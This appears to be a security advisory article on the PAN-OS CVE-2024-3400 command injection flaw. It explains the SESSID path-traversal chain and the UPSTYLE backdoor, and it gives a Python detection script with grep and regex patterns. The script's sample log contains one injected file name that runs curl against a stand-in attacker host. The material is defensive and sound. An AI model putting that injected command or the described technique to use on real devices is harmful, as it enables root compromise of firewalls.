CVE-2024-3400: Palo Alto PAN-OS RCE Exploited by State Actors
- [01] State-backed actors are exploiting a critical command injection vulnerability in Palo Alto Networks firewalls to gain unauthenticated root access on the device and, from there, a foothold in internal networks.
- [02] Vulnerable systems are Palo Alto Networks PAN-OS 10.2, 11.0 and 11.1 firewalls with a GlobalProtect gateway or portal configured. Device telemetry was initially listed as a precondition, but Palo Alto Networks later withdrew that: exploitation does not require telemetry to be enabled.
- [03] Organizations must immediately apply the vendor-provided hotfixes. Disabling device telemetry, which the vendor first offered as a temporary mitigation, is no longer considered effective; until the hotfix is installed, the Threat Prevention signatures for this CVE should be applied to the GlobalProtect interface.
A sophisticated campaign attributed to Chinese state-sponsored actors has been observed exploiting a critical Zero-Day vulnerability in Palo Alto Networks PAN-OS software. The flaw, tracked as CVE-2024-3400 and rated CVSS 10.0, is a command injection vulnerability in the GlobalProtect feature that allows unauthenticated, remote attackers to achieve RCE with root privileges on the firewall. According to SecurityWeek, the exploitation follows a pattern consistent with APT groups focused on high-value targets, including government agencies and critical infrastructure.
Technical Analysis of CVE-2024-3400 Exploitation
The vulnerability is a two-step chain. First, the GlobalProtect component of PAN-OS fails to validate the value of the SESSID cookie when it persists a session: a value containing path traversal sequences (../) is used as part of a file path, so an unauthenticated request to the GlobalProtect gateway or portal causes an empty file with an attacker-chosen name to be created, owned by root, anywhere on the filesystem. Second, a scheduled device telemetry job builds a shell command from the names of files it finds in its working directory under /opt/panlogs/tmp/device_telemetry/ without quoting them. By writing the empty file into that directory with shell metacharacters in its name, the attacker turns the file name into a command that runs as root when the telemetry job next executes. This is why the first advisory listed telemetry as a precondition and why the vendor later reversed itself: the file-creation primitive does not depend on telemetry, and other execution paths were found.
Security researchers from Volexity, which discovered the in-the-wild exploitation and tracks the actor as UTA0218, and Mandiant (which the article associates with UNC5325) have observed the deployment of a custom Python-based backdoor known as ‘UPSTYLE’. This backdoor is designed to maintain persistence and facilitate Lateral Movement within the victim’s environment. The attackers utilize a multi-stage approach, often performing initial reconnaissance before deploying more permanent C2 infrastructure. Once root access is achieved, the threat actor can exfiltrate the running configuration, GlobalProtect session tokens and cached credentials from the device.
UNC5325 Threat Actor TTPs and Attribution
While Palo Alto Networks has not explicitly named a specific nation-state, the TTP profile aligns with known Chinese operations. These actors frequently target perimeter devices, such as firewalls and VPN concentrators, because such appliances typically cannot run EDR agents, sit outside most vulnerability-scanning coverage, and provide a stable, high-trust entry point for further network penetration. The use of specialized malware like UPSTYLE indicates a high level of preparation. The actors have also been observed attempting to bypass detection by clearing logs and modifying system files to hide their presence, complicating the work of a SOC during incident response.
How to Detect CVE-2024-3400 Exploit Patterns
Defenders should prioritize three checks. First, look for unauthorized file creation in /var/appweb/sslvpndocs/global-protect/portal/css/ and in /opt/panlogs/tmp/device_telemetry/, the two directories the actors used for their zero-byte marker files and injected commands. Second, search the GlobalProtect service log for the path traversal attempt itself; Palo Alto Networks published a CLI check for exactly this, run on the firewall as grep pattern "failed to unmarshal session(.\+.\/" mp-log gpsvc.log*, which matches the malformed SESSID values logged when the exploit request is processed. Third, review firewall logs for unusual outbound connections from the management plane, which is how the second-stage payload and the UPSTYLE backdoor are fetched. Security teams should also look for IoC markers associated with UPSTYLE, such as unexpected Python processes running as root on the device.
Integrating firewall logs into a SIEM for automated correlation can help identify the post-exploitation activity that follows the command injection; note that no separate Privilege Escalation step is needed, because the injected command already runs as root. Mapping these actions against the MITRE ATT&CK framework highlights that the actors are primarily utilizing ‘Exploit Public-Facing Application’ (T1190) and ‘External Remote Services’ (T1133) for initial access.
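The detection logic above, turned into a small script as an added example (this is editorial example code, not a tool published by Palo Alto Networks, Volexity or Mandiant). It scans gpsvc.log-style lines for the vendor-documented "failed to unmarshal session(" marker, resolves any path traversal in the logged SESSID, and rates the hit: an attempt that lands in the device telemetry directory with shell metacharacters in the file name is the command-injection pattern, a bare traversal anywhere else is the file-creation primitive. It also flags unexpected names in the GlobalProtect css directory. The sample log lines and directory listing are constructed; the surrounding timestamp and level fields are assumptions about the log layout, and the rule that legitimate files in the css directory end in .css is an assumption you should verify against a known-good device.

```python
import re
from dataclasses import dataclass

# Vendor-documented marker written to gpsvc.log when a malformed SESSID is seen.
UNMARSHAL_RE = re.compile(r"failed to unmarshal session\((?P<sessid>[^)]*)\)")

# Directory whose file names the telemetry job passed unquoted to a shell.
TELEMETRY_DIR = "/opt/panlogs/tmp/device_telemetry/"

# Characters that turn a file name into a command once it reaches a shell.
# Assumption: this set is illustrative, not an exhaustive list.
SHELL_META = re.compile(r"[`$;|&<>]")

# Constructed sample lines (timestamp/level layout is an assumption).
SAMPLE_GPSVC_LOG = [
    "2024-04-12 03:11:07 [INFO] session validated for user alice",
    "2024-04-12 03:12:44 [ERROR] failed to unmarshal session("
    "/../../../../opt/panlogs/tmp/device_telemetry/minute/h0st`curl${IFS}attacker.example/x`)",
    "2024-04-12 03:12:45 [ERROR] failed to unmarshal session("
    "/../../../../var/appweb/sslvpndocs/global-protect/portal/css/probe.txt)",
    "2024-04-12 03:13:02 [ERROR] failed to unmarshal session(3f9a0c2b1e)",
]

# Constructed listing of /var/appweb/sslvpndocs/global-protect/portal/css/.
SAMPLE_CSS_LISTING = ["base.css", "login.css", "probe.txt"]


@dataclass
class Finding:
    line_no: int
    sessid: str
    traversal: bool          # SESSID is a path, not an opaque token
    targets_telemetry: bool  # resolved path lands in the telemetry directory
    shell_meta: bool         # file name would be interpreted by a shell

    @property
    def severity(self) -> str:
        if self.traversal and self.targets_telemetry and self.shell_meta:
            return "critical"  # command injection via telemetry job
        if self.traversal:
            return "high"      # arbitrary root-owned file creation
        return "info"          # malformed but non-traversal value


def normalise(path: str) -> str:
    """Resolve ../ and ./ segments so we can see where the file would land."""
    parts = []
    for seg in path.split("/"):
        if seg == "..":
            if parts:
                parts.pop()
        elif seg and seg != ".":
            parts.append(seg)
    return "/" + "/".join(parts)


def scan_gpsvc_log(lines):
    """Return one Finding per 'failed to unmarshal session(...)' line."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = UNMARSHAL_RE.search(line)
        if not m:
            continue
        sessid = m.group("sessid")
        traversal = "../" in sessid or sessid.startswith("/")
        resolved = normalise(sessid) if traversal else ""
        findings.append(Finding(
            line_no=n,
            sessid=sessid,
            traversal=traversal,
            targets_telemetry=resolved.startswith(TELEMETRY_DIR),
            shell_meta=bool(SHELL_META.search(sessid)),
        ))
    return findings


def unexpected_css_files(listing, allowed_suffixes=(".css",)):
    """Names in the GlobalProtect css directory that do not look like stylesheets.
    Assumption: a clean device only has .css files here; confirm on a known-good unit."""
    return [name for name in listing if not name.lower().endswith(allowed_suffixes)]


if __name__ == "__main__":
    for f in scan_gpsvc_log(SAMPLE_GPSVC_LOG):
        print(f"line {f.line_no}: {f.severity:8s} {f.sessid}")
    print("unexpected css files:", unexpected_css_files(SAMPLE_CSS_LISTING))
```

On a real device, feed the script the output of the grep above exported from the firewall (or the full gpsvc.log pulled in a tech-support file) and a directory listing taken over SSH; treat any "critical" finding as confirmed exploitation and any "high" finding as at least an attempt that warrants a full forensic review, since the actors were observed deleting their marker files afterwards.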
Palo Alto PAN-OS Command Injection Mitigation
The most effective Palo Alto PAN-OS command injection mitigation is the immediate application of the vendor hotfixes, first released as PAN-OS 10.2.9-h1, 11.0.4-h1 and 11.1.2-h3 and subsequently backported to additional maintenance releases of the 10.2, 11.0 and 11.1 trains. Palo Alto Networks initially recommended disabling device telemetry as a temporary measure, but its updated advisory states that this is not an effective mitigation, because the file-creation primitive does not depend on telemetry. Organizations that cannot patch immediately should instead enable the Threat Prevention signatures published for this CVE (Threat IDs 95187, 95189 and 95191) in a vulnerability protection profile applied to the GlobalProtect interface, and treat that only as a stopgap until the hotfix is installed. Any device that was exposed before patching should be checked for the indicators above, since a hotfix removes the vulnerability but not an existing backdoor.
Security leaders should also review their Zero Trust architecture to ensure that even if a perimeter device is compromised, the impact on internal resources is minimized through strict segmentation and identity-based access controls.